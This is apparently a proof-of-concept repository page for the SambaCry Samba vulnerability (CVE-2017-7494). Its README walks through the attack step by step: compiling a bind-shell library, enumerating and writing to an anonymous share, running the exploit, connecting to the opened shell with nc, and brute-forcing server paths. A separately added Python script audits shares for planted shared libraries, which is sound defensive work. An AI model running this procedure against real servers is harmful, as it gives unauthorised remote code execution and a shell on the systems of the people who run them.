CVE-2017-7494 PoC — Samba Security Vulnerability

Source
Associated Vulnerability
Title: Samba Security Vulnerability (CVE-2017-7494)
Description: Samba since version 3.5.0 and before 4.6.4, 4.5.10 and 4.4.14 is vulnerable to remote code execution, allowing a malicious client to upload a shared library to a writable share, and then cause the server to load and execute it.
Description
SambaCry (CVE-2017-7494) exploit for Samba | bind shell without Metasploit
Readme
# CVE-2017-7494 SambaCry Exploit

SambaCry (CVE-2017-7494) exploit for Samba (bind shell without Metasploit)

If you need to change the port, edit line 68 of *bindshell-samba.c* and recompile:<br>
![image](https://user-images.githubusercontent.com/76706456/199360465-0ade3332-87b6-4c27-8adc-bbed6cc475d2.png)

```
gcc -c -fpic bindshell-samba.c
```
```
gcc -shared -o libbindshell-samba.so bindshell-samba.o
```
<br>

**How to exploit:**<br>

List the shares (this example uses an anonymous user):
```
smbclient -L //192.168.10.131/ -U "" -N
```
```
	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	publico         Disk      Publico
	IPC$            IPC       IPC Service (maq131 server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            CHORA
```
<br>

Access a folder and check whether the user has write permissions:
```
smbclient //192.168.10.131/publico -U "" -N
```
<br>

If the user has write permissions, upload the file *libbindshell-samba.so*:
```
smb: \> mput libbindshell-samba.so
```
```
Put file libbindshell-samba.so? yes
putting file libbindshell-samba.so as \libbindshell-samba.so (3.5 kb/s) (average 3.5 kb/s)
smb: \> dir
  .                                   D        0  Tue Nov  1 19:44:15 2022
  ..                                  D        0  Wed Jun 14 14:16:35 2017
  libbindshell-samba.so               A     8432  Tue Nov  1 19:44:17 2022

		3997376 blocks of size 1024. 1960284 blocks available
smb: \>
```
<br>

**Then just run the exploit:**<br>
`python2 exploit.py -t target_ip -m path_absoluto_server_side`<br><br>
Example:
```
python2 exploit.py -t 192.168.10.131 -m /home/publico/libbindshell-samba.so
```

Connect to port 6699/TCP:
```
nc -vn 192.168.10.131 6699
```

![image](https://user-images.githubusercontent.com/76706456/199361239-069544a7-0ef1-4868-8f58-7e6db17f5e2b.png)
<br><br>

**If you do not know the absolute server-side path, guess it and wait for port 6699/TCP to open:**
```
for i in $(cat paths.txt);do python2 exploit.py -t 192.168.10.131 -m $i/publico/libbindshell-samba.so 2>/dev/null;done
```
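
A defensive check for the condition this procedure depends on, a shared library sitting in a writable share: the Python example below is added here and is not part of the repository. It walks a share's directory on the server and flags files whose ELF header marks them as shared objects, whatever their extension; the sample directory and headers are constructed, and `audit_share`, `fake_elf` and `demo` are names chosen for this example.

```python
import os
import struct
import tempfile
from pathlib import Path

ELF_MAGIC = b"\x7fELF"
ET_DYN = 3  # e_type of shared objects (PIE executables use it too)

def is_elf_shared_object(header):
    """True if the bytes start with an ELF header whose e_type is ET_DYN."""
    if len(header) < 18 or header[:4] != ELF_MAGIC or header[5] not in (1, 2):
        return False
    order = "<" if header[5] == 1 else ">"  # EI_DATA: 1 = little, 2 = big endian
    return struct.unpack_from(order + "H", header, 16)[0] == ET_DYN

def audit_share(root):
    """Return sorted paths under root whose content is an ELF shared object."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    if is_elf_shared_object(fh.read(18)):
                        hits.append(path)
            except OSError:
                continue  # unreadable file: skip it, keep auditing
    return sorted(hits)

def fake_elf(e_type, order="<"):
    """Constructed 18-byte ELF header stub (sample data, not a real library)."""
    return ELF_MAGIC + bytes([2, "<>".index(order) + 1, 1] + [0] * 9) + struct.pack(order + "H", e_type)

def demo():
    """Build a constructed share directory and return the flagged relative paths."""
    with tempfile.TemporaryDirectory() as share:
        samples = {
            "notes.txt": b"plain text",
            "renamed.jpg": fake_elf(ET_DYN),       # extension is not trusted
            "tool.bin": fake_elf(2),                # ET_EXEC, not a shared object
            "sub/lib.so": fake_elf(ET_DYN, ">"),    # big-endian shared object
        }
        for rel, data in samples.items():
            target = Path(share, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_bytes(data)
        return [os.path.relpath(p, share) for p in audit_share(share)]

if __name__ == "__main__":
    print(demo())
```

On a real server, call `audit_share` with the filesystem path behind each writable share (the example above uses `/home/publico`) and review any hit that is not an expected file.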
File Snapshot

```
[4.0K] /data/pocs/9700e9600ef60f2b37742de8ae0b1bcd29bd9942
├── [1.9K] bindshell-samba.c
├── [  94] bindshell-samba.h
├── [ 688] exploit.py
├── [8.2K] libbindshell-samba.so
├── [ 106] paths.txt
└── [2.3K] README.md

0 directories, 6 files
```